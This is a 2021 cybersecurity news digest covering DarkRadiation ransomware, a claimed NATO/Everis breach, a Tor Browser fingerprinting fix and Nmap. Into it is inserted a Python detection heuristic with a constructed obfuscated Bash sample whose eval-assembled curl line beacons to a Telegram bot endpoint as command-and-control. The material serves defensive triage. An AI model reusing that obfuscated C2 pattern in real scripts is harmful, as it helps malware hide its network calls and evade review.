Cyber Security News — Past 24 hours | 24.06.2021
Wormable DarkRadiation Ransomware Targets Linux and Docker Instances
Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called “DarkRadiation” that’s implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control communications.
DarkRadiation’s infection chain involves a multi-stage attack process and is noteworthy for its extensive reliance on Bash scripts to retrieve the malware and encrypt the files as well as Telegram API to communicate with the C2 server via hardcoded API keys.
Said to be under active development, the ransomware leverages obfuscation tactics to scramble the Bash script using an open-source tool called “node-bash-obfuscate” to split the code into multiple chunks, followed by assigning a variable name to each segment and replacing the original script with variable references.
Interestingly, SentinelOne’s analysis reveals different variations: in a few versions the password for the user “ferrum” is downloaded from the attacker’s C2 server, while in others it is hardcoded with strings such as “$MeGaPass123#,” implying that the malware is undergoing rapid changes prior to actual deployment.
“It must be noted that the ransomware appends radioactive symbols as a file extension for an encrypted file,” Trend Micro threat researcher Aliakbar Zahravi said.
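The two script-level traits described above (node-bash-obfuscate style chunking reassembled through eval, and a Telegram Bot API endpoint used for C2) can be turned into a simple triage heuristic for suspicious Bash files. The following is an added example, not code from the article or from any vendor's tooling; the sample script is constructed to mimic the described shape and is not the real malware.

```python
"""Heuristic triage of a Bash script for the traits the DarkRadiation write-up
describes: code split into chunks assigned to variables and reassembled via
eval, plus a hardcoded api.telegram.org bot endpoint used for C2."""
import re

# Constructed sample (not the actual malware): the Telegram URL is deliberately
# split across chunks so a naive grep on the raw file would miss it.
SAMPLE_SCRIPT = """#!/bin/bash
_0xa="cur"
_0xb="l -s https://api.tele"
_0xc="gram.org/bot123456789:TOKEN_PLACEHOLDER"
_0xd="/sendMessage -d chat_id=1 -d text=start"
eval "$_0xa$_0xb$_0xc$_0xd"
"""

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)=["\'].*["\']\s*$')
EVAL_RE = re.compile(r'^\s*eval\s+"?((?:\$\{?[A-Za-z_][A-Za-z0-9_]*\}?)+)"?')
VAR_RE = re.compile(r'\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?')
TELEGRAM_RE = re.compile(r'api\.telegram\.org/bot')

def triage(script: str) -> dict:
    """Return indicator flags and a score; a score >= 2 means 'look closer',
    not proof of infection (legitimate installers also use eval)."""
    lines = script.splitlines()
    assigned = {m.group(1) for m in map(ASSIGN_RE.match, lines) if m}
    eval_refs = []
    for line in lines:
        m = EVAL_RE.match(line)
        if m:
            eval_refs += VAR_RE.findall(m.group(1))
    # Obfuscation shape: eval reassembling several previously assigned chunks.
    chunked_eval = len(eval_refs) >= 3 and set(eval_refs) <= assigned
    # C2 indicator: join all string literals so a URL split across chunks is
    # still visible, then search the raw text and the joined text.
    joined = "".join(re.findall(r'["\']([^"\']*)["\']', script))
    telegram_c2 = bool(TELEGRAM_RE.search(script) or TELEGRAM_RE.search(joined))
    score = int(chunked_eval) + int(telegram_c2) + int(len(assigned) >= 4)
    return {"chunk_vars": len(assigned), "chunked_eval": chunked_eval,
            "telegram_c2": telegram_c2, "score": score}

if __name__ == "__main__":
    print(triage(SAMPLE_SCRIPT))
```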
NATO’s Cloud Platform Hacked
The SOA & IdM platform is utilized by NATO and is classified as secret. It was used to conduct various critical functions inside the Polaris programme. The North Atlantic Treaty Organization, commonly known as the North Atlantic Alliance, is an intergovernmental military alliance made up of 30 European and North American countries.
Polaris was developed as part of NATO’s IT modernization effort and uses the SOA & IdM platform to provide centralized security, integration, and hosting information management. The military alliance classified the platform as a secret because it performs multiple key roles.
According to the hackers, they used a backdoor to make copies of the data on this platform and attempted to blackmail Everis. They went even further, making jokes about handing over the stolen material to Russian intelligence.
Furthermore, the attackers initially concentrated solely on Everis’ corporate data in Latin America, despite NATO’s announcement that it was ready to respond to a cyber-attack. To their astonishment, one of the secure NATO systems was found among the assets of Everis’ subsidiaries.
After analyzing the company and discovering documents connected to drones and military defense systems, the hackers continued stealing more data from Everis networks.
Tor Browser 10.0.18 Released — Fixes the Flaw That Let Websites Track Users
Tor is one of the largest open-source privacy projects; its network of virtual tunnels enables people and groups to improve their privacy and security on the Internet.
Tor has recently released Tor Browser 10.0.18, whose main purpose is to fix numerous bugs, including a vulnerability that allowed websites to track users by fingerprinting the applications installed on their systems.
The Tor network consists of nearly seven thousand relays that help conceal a user’s location and usage from anyone conducting network surveillance or traffic analysis.
Scheme flooding is a vulnerability that uses custom URL schemes as an attack vector: by probing which schemes the browser will hand off, a website can learn which applications are installed on the user’s computer.
The goal is to derive a permanent unique identifier for that computer, so the user can still be recognized even after switching browsers, using incognito mode, or connecting through a VPN.
Nmap — A Detailed Explanation of the Penetration Testing Tool Used for Information Gathering
Nmap is an open-source network discovery and port-scanning tool that finds hosts and services on a network by sending packets to the target hosts, for the purposes of network discovery and security auditing.
Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
It was designed to rapidly scan large networks, but works fine against single hosts. It runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.
In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer, a flexible data transfer, redirection, and debugging tool, a utility for comparing scan results, and a packet generation and response analysis tool.
Stay Focused. Stay Vigilant.
Cyber Threat Incident Management Team — Cyber Security Community @ SLIIT